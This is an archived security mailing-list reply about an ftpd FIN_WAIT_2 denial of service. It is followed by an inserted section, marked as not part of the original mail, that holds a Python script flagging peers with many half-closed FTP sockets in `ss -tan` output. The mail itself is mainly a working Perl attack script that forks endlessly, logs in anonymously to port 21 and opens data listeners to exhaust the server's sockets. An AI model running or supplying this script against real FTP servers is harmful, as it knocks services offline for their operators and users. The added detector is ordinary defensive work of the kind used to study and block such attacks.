In some mail from Theo de Raadt, sie said:
[...]
> The OpenBSD ftpd has never permitted more than 1 connection at a time
> in PASV mode, thus this particular denial of service attack does not
> work.

Excellent.

> I caused myself some difficulties by accidentally starting up 400 perl
> instances, though..

There's no helping pilot error ;)

Below is an attached perl script which attacks based on the fin-wait-2
`problem'.

Darren

#!/usr/bin/perl
$DOS_HOST="localhost";
use IO::Socket;

$pid = $$;
$num = 0;

while (1) {
    while (fork) {
        $sock = IO::Socket::INET->new(
                Proto => "tcp",
                PeerAddr => $DOS_HOST,
                PeerPort => "ftp(21)",
            );
        last if (!$sock);
        $me = getsockname($sock);
        ($mport, $mip) = unpack_sockaddr_in($me);
        if (!$sock) {
            print "connect failed!\n";
            waitpid -1,0;
        }
        $sock->autoflush(1);
        while (<$sock>) {
            print;
            print $sock "USER anonymous\r\n" if (/^220 .*/);
            print $sock "PASS root@\r\n" if (/^331 .*/);
            if (/^150 .*/) {
                $conn[$num++] = $x->accept();
            } elsif (/^200 .*/) {
                print $sock "NLST\r\n";
            } elsif (/^230 .*/ || /^226 .*/) {
                $x = IO::Socket::INET->new(
                        Proto => "tcp",
                        LocalAddr => inet_ntoa($mip),
                        Listen => 1,
                    );
                last if (!$x);
                $lsock[$num] = $x;
                $local = getsockname($x);
                ($lport, $lip) = unpack_sockaddr_in($local);
                ($sip = inet_ntoa($mip)) =~ s/\./,/g;
                $lp[0] = $lport >> 8;
                $lp[1] = $lport & 0xff;
                print $sock "PORT $sip,$lp[1]\r\n";
            }
            last if (/^530 .*/);
        }
        waitpid -1,0;
    }
    sleep(5);
}
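The following is an added example and is not part of Darren's mail or of any ftpd code: it shows the server-side view of what the attached script produces, namely one source address holding many control and data sockets against port 21, a number of which sit in FIN_WAIT_2 after the client side drops them. It parses socket-state lines in the column layout of `ss -tan` (State, Recv-Q, Send-Q, Local:Port, Peer:Port), counts states per peer for sockets bound to the FTP port, and flags peers that exceed a threshold. The sample lines are constructed, not captured from a real host, and the two thresholds are assumptions to be tuned to a server's normal load; the point Theo makes above, that ftpd should allow only one data connection at a time per session, remains the actual fix on the server.

```python
"""Flag peers holding many FTP sockets, especially in FIN-WAIT-2.

Added example, not code from the original mail. Input format is assumed
to be the `ss -tan` column layout; sample data below is constructed.
"""
from collections import Counter, defaultdict

FTP_PORT = 21
FIN_WAIT_2_LIMIT = 5   # assumed threshold: FIN-WAIT-2 sockets per peer
TOTAL_LIMIT = 20       # assumed threshold: all non-listening sockets per peer

# Constructed sample in `ss -tan` layout; 198.51.100.7 behaves like the
# script above (many control/data sockets, most already half-closed).
SAMPLE_SS_OUTPUT = """\
State      Recv-Q Send-Q Local Address:Port   Peer Address:Port
ESTAB      0      0      192.0.2.10:21        198.51.100.7:40001
ESTAB      0      0      192.0.2.10:21        198.51.100.7:40002
FIN-WAIT-2 0      0      192.0.2.10:21        198.51.100.7:40003
FIN-WAIT-2 0      0      192.0.2.10:21        198.51.100.7:40004
FIN-WAIT-2 0      0      192.0.2.10:21        198.51.100.7:40005
FIN-WAIT-2 0      0      192.0.2.10:21        198.51.100.7:40006
FIN-WAIT-2 0      0      192.0.2.10:21        198.51.100.7:40007
FIN-WAIT-2 0      0      192.0.2.10:21        198.51.100.7:40008
ESTAB      0      0      192.0.2.10:21        203.0.113.5:51000
ESTAB      0      0      192.0.2.10:22        203.0.113.5:51001
LISTEN     0      128    0.0.0.0:21           0.0.0.0:*
"""


def split_endpoint(endpoint):
    """Split 'host:port' on the last colon so IPv6 literals survive."""
    host, _, port = endpoint.rpartition(":")
    return host, port


def parse_ss(text):
    """Return (state, local_host, local_port, peer_host, peer_port) tuples."""
    records = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] == "State":
            continue  # header or blank line
        state, local, peer = fields[0], fields[3], fields[4]
        lhost, lport = split_endpoint(local)
        phost, pport = split_endpoint(peer)
        if not lport.isdigit():
            continue
        records.append((state, lhost, int(lport), phost, pport))
    return records


def per_peer_states(records, port=FTP_PORT):
    """Count socket states per peer for sockets on the given local port."""
    summary = defaultdict(Counter)
    for state, _lhost, lport, phost, _pport in records:
        if lport != port or state == "LISTEN":
            continue
        summary[phost][state] += 1
    return summary


def flag_peers(summary, port=FTP_PORT,
               fin_limit=FIN_WAIT_2_LIMIT, total_limit=TOTAL_LIMIT):
    """Return [(peer, reason)] for peers over either threshold."""
    flagged = []
    for peer, states in sorted(summary.items()):
        fw2 = states["FIN-WAIT-2"]
        total = sum(states.values())
        if fw2 >= fin_limit:
            flagged.append((peer, f"{fw2} sockets in FIN-WAIT-2 on port {port}"))
        elif total >= total_limit:
            flagged.append((peer, f"{total} sockets on port {port}"))
    return flagged


def check(text=SAMPLE_SS_OUTPUT, port=FTP_PORT):
    """Parse, summarise and flag in one call; returns the flagged list."""
    return flag_peers(per_peer_states(parse_ss(text), port), port)


if __name__ == "__main__":
    for peer, reason in check():
        print(f"ALERT {peer}: {reason}")
```

Run it against live output with `check(subprocess.run(["ss", "-tan"], capture_output=True, text=True).stdout)`; the sample host on port 22 and the listening socket are ignored, so only the peer piling up FTP sockets is reported.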
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:19:17 PDT